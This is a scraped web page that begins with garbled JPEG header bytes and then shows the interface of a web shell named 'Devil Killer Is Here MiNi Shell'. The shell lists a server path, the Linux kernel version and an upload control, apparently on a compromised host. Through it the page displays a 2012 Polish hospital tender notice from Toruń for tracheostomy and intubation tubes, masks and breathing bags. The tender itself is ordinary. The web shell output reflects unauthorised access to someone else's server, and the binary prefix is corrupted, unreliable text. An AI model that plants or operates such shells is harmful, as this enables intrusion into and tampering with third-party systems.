JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120130/24699-N-2012.html

<p class="kh_header"><b>Toruń: Dostawa rurek tracheostomijnych, kaniuli, rurek intubacyjnych, rurek laryngektomijnych, zaworów foniatrycznych, pasków mocujących; rurek dotchawiczych, rurek intubacyjnych, rurek dooskrzelowych, prowadnic, rurek nosowo- gardłowych i ustno- gardłowych, masek twarzowych, worków oddechowych, zestawów do leczenia niedotlenienia.</b><br>
<b>Numer ogłoszenia: 24699 - 2012; data zamieszczenia: 30.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wszz.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa rurek tracheostomijnych, kaniuli, rurek intubacyjnych, rurek laryngektomijnych, zaworów foniatrycznych, pasków mocujących; rurek dotchawiczych, rurek intubacyjnych, rurek dooskrzelowych, prowadnic, rurek nosowo- gardłowych i ustno- gardłowych, masek twarzowych, worków oddechowych, zestawów do leczenia niedotlenienia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: <br><br>

Zadanie Nr 1 - dostawa rurek tracheostomijnych, kaniuli, rurek intubacyjnych, rurek   laryngektomijnych, zaworów foniatrycznych, pasków mocujących:<br>
1. Rurka tracheostomijna z mankietem typu Hi-Lo z linią RTG ze stałym transparentnym szyldem z oznaczeniem średnicy zewnętrznej i wewnętrznej rurki, transparentny balonik kontrolny oraz dren łączący z rurką, transparentny łącznik 15 mm ,  w komplecie tasiemka oraz prowadnica, sterylna, od 5 do 10	 - 50 szt.	<br>
2. Rurka tracheostomijna z otworami fenestracyjnymi (4 otwory) i bez otworów, miękkim, obrotowym (w płaszczyźnie góra-dół) szyldem, z mankietem wysokoobjętościowym niskociśnieniowym i bez oraz jednorazową kaniulą wewnętrzną mocowaną na rurce za pomocą specjalnego zatrzasku. W komplecie obturator, zatyczka dekaniulacyjna oraz taśma do mocowania, sterylna, od 4 do 10	 - 50 szt.	<br>
3. Kaniule wewnętrzne jednorazowego użytku ze zintegrowanym złączem zatrzaskowym 15 mm, do szybkiej i bezpiecznej wymiany, od 4 do 10	- 50 szt.	<br>
4. Rurki tracheostomijne do długoterminowego użytkowania z kaniulą wewnętrzną wielorazowego użytku, wykonane z wysokiej jakości medycznego PCW, z mankietem wysokoobjętościowym niskociśnieniowym i bez, z pojedynczym otworem fenestracyjnym i bez otworu, z obrotowym (w płaszczyźnie góra-dół) szyldem (obrót szyldu umożliwiający dopasowanie do warunków anatomicznych pacjenta), W komplecie obturator, zatyczka dekaniulacyjna oraz taśma do mocowania, sterylna, od 4 do 10 - 50 szt.	<br>
5. Rurka laryngektomijna, wykonana z wysokiej jakości materiału o dużej podatności (alternatywa do rurek metalowych), jednorazowa, sterylna, od 6 do 10 - 100 szt.	<br>
6. Zawór foniatryczny do rurek tracheostomijnych z membraną silikonową z integralnym złączem do podawania tlenu i bez membrany - 10 szt.<br>
7. Standardowa rurka tracheostomijna z regulowanym kołnierzem i mankietem typu HI-LO z linią RTG w komplecie tasiemka oraz prowadnica, sterylna, od 5 do 10	 - 100 szt.	<br>
8. Zbrojona rurka tracheostomijna z regulowanym kołnierzem, mankietem typu HI-LO oraz systemem do automatycznego dostosowania ciśnienia w mankiecie, sterylna, od 6 do 11 - 100 szt.	<br>
9. Rurka tracheostomijna z mankietem niskociśnieniowym  z systemem umożliwiającym  ciągłą kontrolę ciśnienia w mankiecie  oraz możliwością odsysania wydzieliny znad mankietu ze stałym transparentnym szyldem z zaznaczonym rozmiarem rurki, dren do odsysania o grubości min 4 mm połączony z szyldem rurki, sterylna, od 6 do 10 - 50 szt.<br>	
10. Rurka tracheostomijna z mankietem z czystego silikonu, sterylna, od 5 do 9,5 - 50 szt.	<br>
11. Rurka tracheostomijna z mankietem wysokoobjetościowym niskociśnieniowym i bez mankietu, z przedłużoną częścią proksymalną, obrotowym szyldem oraz z wewnętrzną kaniulą, sterylna, od 5 do 8 - 20 szt.	<br>
12. Rurka tracheostomijna z mankietem wysokoobjetościowym niskociśnieniowym i bez mankietu, z przedłużoną częścią dystalną, obrotowym  szyldem oraz wewnętrzną kaniulą, sterylna, od 5 do 8 - 20 szt.	<br>
13. Wymienne kaniule do rurek tracheostomijnych z przedłużoną częścią dystalną bądź proksymalną, sterylna, od 5 do 8 - 40 szt.	<br>
14. Pasek mocujący do rurek tracheostomijnych z wygodnym systemem zapinania i podwójną regulacją długości (na rzep)	- 10000 szt.	<br>
15. Rurka intubacyjna z mankietem w kształcie stożka do przedłużonej intubacji wyposażona w system drenażu przestrzeni podgłośniowej. min.dwa oznaczenia rozmiaru na korpusie rurki, półtransparentny łącznik 15mm, mankiet niskociśnieniowy, w górnej części o średnicy większej niż średnica tchawicy, zwężający się stopniowo ku dołowi (stożek), posiadający dzięki swej konstrukcji strefę całkowitego uszczelnienia tchawicy. grubość mankietu ok.50 mikronów, dren do odsysania min. 4 mm średnicy, sterylna, od 3,0  do 10,0 co 0,5 cm	 - 300 szt.	<br>
16. Rurka intubacyjna z mankietem w kształcie stożka do przedłużonej intubacji , min. dwa oznaczenia rozmiaru na korpusie rurki,półtransparentny łącznik 15mm, mankiet niskociśnieniowy, w górnej części o średnicy większej niż średnica tchawicy, zwężający się stopniowo ku dołowi (stożek), posiadający dzięki swej konstrukcji strefę całkowitego uszczelnienia tchawicy, grubość mankietu ok.50 mikronów, sterylna, od 5 do 10 - 500	szt.	<br>
17. Rurki tracheostomijne z uszczelnieniem dla dzieci, niskociśnieniowy, cienkościenny mankiet, jałowe, pakowane pojedynczo, tasiemka mocująca, od 4,0 do 9,0 co 0,5 cm	- 500 szt.	<br>
18. Rurki tracheostomijne bez uszczelnienia dla dzieci, jałowe, pakowane pojedynczo, tasiemka mocująca, od 3,0 do 8,0 co 0,5 cm - 100 szt.<br><br>	
 
Zadanie Nr 2 - dostawa rurek dotchawiczych, rurek inkubacyjnych, rurek odoskrzelowych, prowadnic, rurek nosowo- gardłowych i ustno- gardłowych, masek twarzowych, worków oddechowych:<br>

1. Rurka dotchawicza bez mankietu uszczelniającego (do intubacji przez usta i nos), opakowanie odpowiadające kształtem krzywiźnie rurki, sterylna	, od 2 do 7 co 0,5cm	- 1000 szt.	<br>
2. Rurka intubacyjna do intubacji przez nos lub usta z mankietem niskociśnieniowym wysokoobjętościowym, sterylna, od 3 do 10 co 0,5cm - 6000 szt.	<br>
3. Rurka dotchawicza zbrojona z mankietem niskociśnieniowym (dwa oznaczenia głębokości nad mankietem w postaci ringów dookoła obwodu rurki), wyposażona w metalową spiralę wzmacniającą, sterylna, od 3 do 9,5 co 0,5cm	- 1500 szt.	<br>
4. Rurka dotchawicza do mikrochirurgii krtani (do intubacji przez usta jak i przez nos), sterylna	, od 4 do 6 - 50 szt.<br>	
5. Rurka uformowana do laryngektomii, stosowana podczas operacji krtani lub tchawicy, sterylna, od 7 do 8 - 50 szt.<br>	
6. Kształtowana rurka intubacyjna do zastosowania podczas zabiegów w obrębie głowy i szyi doustna z mankietem, sterylna, od 4 do 9 - 500 szt.<br>	
7. Kształtowana rurka intubacyjna do zastosowania podczas zabiegów w obrębie głowy i szyi donosowa z mankietem, sterylna, od 6 do 8 - 500 szt.	<br>
8. Rurka intubacyjna wyłącznie donosowa, (północna ) z mankietem Hi-Lo z dwoma ringami nad mankietem na całym obwodzie rurki, z linią RTG, specjalne bardzo delikatne i miękkie tworzywo, sterylna, od 6 do 8 - 200 szt.	<br>
9. Rurka dooskrzelowa lewa z mankietem tchawiczym z poliuretanu, znaczniki  RTG na zakończeniu dystalnym  rurki, ponad mankietem dooskrzelowym z PCV  a także przy wejściu do tchawicy ułatwiające i weryfikujące położenie rurki. W zestawie dwa cewniki do odsysania oraz złączka Y wraz z zestawem złączy, sterylna, od 28 do 41 CH	- 10 szt.	<br>
10. Rurka dooskrzelowa prawa z mankietem tchawiczym z poliuretanu, znaczniki  RTG na zakończeniu dystalnym  rurki, ponad mankietem dooskrzelowym z PCV  w kształcie litery S  a także przy wejściu do tchawicy ułatwiające i weryfikujące położenie rurki. W zestawie dwa cewniki do odsysania oraz złączka Y wraz z zestawem złączy, sterylna, od 35 do 41 CH	- 10 szt.	<br>
11. Zestaw do CEPAPu jednorazowego użytku, sterylny, do rurek dooskrzelowych - do zapobiegania lub leczenia niedotlenienia podczas znieczulenia z wentylacją jednego płuca	- 20 szt.	<br>
12. Prowadnica do rurek intubacyjnych,sterylna, jednorazowa, pakowana pojedynczo, do rurek od 2,5 do 10	- 100 szt.	<br>
13. Rurka nosowo - gardłowa, sterylna, od 6,5 do 8,5 - 10 szt.	<br>
14. Rurki ustno gardłowe sterylne jednorazowe, od 0 do 6 - 10000 szt.<br>	
15. Rurki intubacyjne bez uszczelnienia, zbrojone do stosowania w anestezjologii, zbrojenie rurki  metalową spiralą, jednolicie zatopioną w jej ścianie, znacznik rtg na całej długości rurki, wbudowane okienko Murphyego, do intubacji przez nos i przez usta, sterylne, jednorazowego użytku, pakowane pojedynczo, od 4,0 do 7,0 co 0,5 cm - 300 szt.	<br>
16. Maski twarzowe anestezjologiczne, jednorazowe, sterylne lub czyste, kodowane kolorami, w wersji standardowej i nadmuchiwane, od 1,0 do 5,0 - 4000 szt.	<br>
17. Worki oddechowe bezlateksowe, sterylne, pakowane pojedynczo, od 0,5 l do 3,0 l	- 4000 szt.	<br>
18. Rurki intubacyjne polarne, do intubacji przez usta jednorazowe, sterylne bez lateksu z jednym otworem z balonem uszczelniającym, od 6,0 do 9,0 co 0,5 cm - 300 szt.	<br>
19. Rurki intubacyjne polarne, do intubacji przez nos jednorazowe, sterylne bez lateksu z jednym otworem z balonem uszczelniającym, od 6,0 do 8,0 co 0,5 cm - 300 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.20-8, 33.17.11.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ wykaz wykonanych min. 2 dostaw wyrobów medycznych o wartości min. dla poszczególnych zadań:
	Zadanie Nr 1 -    67.200,00 zł,
	Zadanie Nr 2 -    62.400,00 zł,
brutto każda dostawa w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 2 dokumentów potwierdzających, że te dostawy zostały wykonane należycie;

Wykonawca składający ofertę na obydwa zadania musi wykazać się zrealizowanymi min. 2 dostawami o wymaganej wartości łącznej 129.600,00 zł każda dostawa.

Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział
w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/	informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty dla poszczególnych zadań:
		Zadanie Nr 1 -  56.000,00 zł,
		Zadanie Nr 2 -  52.000,00 zł,
	 wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
         /Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku         udziału/.
	Wykonawca składający ofertę na obydwa zadania musi załączyć do oferty informację 	banku lub spółdzielczej kasy oszczędnościowo- kredytowej o wymaganej wartości łącznej 	równej sumie 108.000,00 zł.

      Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

      Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) zgłoszenie/powiadomienie Prezesa Urzędu o wprowadzeniu do obrotu i do używania oferowanego wyrobu zgodnie z ustawą o wyrobach medycznych z dnia 20 maja (Dz. U.
 z 2010 r. Nr 107, poz. 679), deklarację zgodności potwierdzającą, że wyrób jest zgodny
z wymaganiami zasadniczymi, certyfikat jednostki notyfikowanej potwierdzającej przeprowadzenie procedury oceny zgodności wyrobu z wymaganiami zasadniczymi;</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) oświadczenie o braku podstaw do wykluczenia zgodnie z załącznikiem Nr 5 do SIWZ <br>
b) oświadczenie o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.<br>
*Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonych przez Zamawiającego warunków.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość aneksowania terminu umowy w przypadku jej niezrealizowania pod względem ilościowym w obowiązującym terminie umownym.

2. Ceny podane w ofercie będą obowiązywać przez okres trwania umowy, a w przypadku zmiany obowiązującej stawki podatku VAT w okresie trwania umowy Wykonawca ma prawo doliczyć do cen netto ustalonych w umowie należny podatek VAT według obowiązującej stawki. Zmiana ta nie będzie wymagała aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wszz.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.wszz.torun.pl lub Wojewódzki Szpital Zespolony im. Ludwika Rydygiera ul. Św. Józefa 53/59, 87- 100 Toruń, Dział Zamówień Publicznych- pokój nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.02.2012 godzina 09:00, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa rurek tracheostomijnych, kaniuli, rurek intubacyjnych, rurek   laryngektomijnych, zaworów foniatrycznych, pasków mocujących..</p>
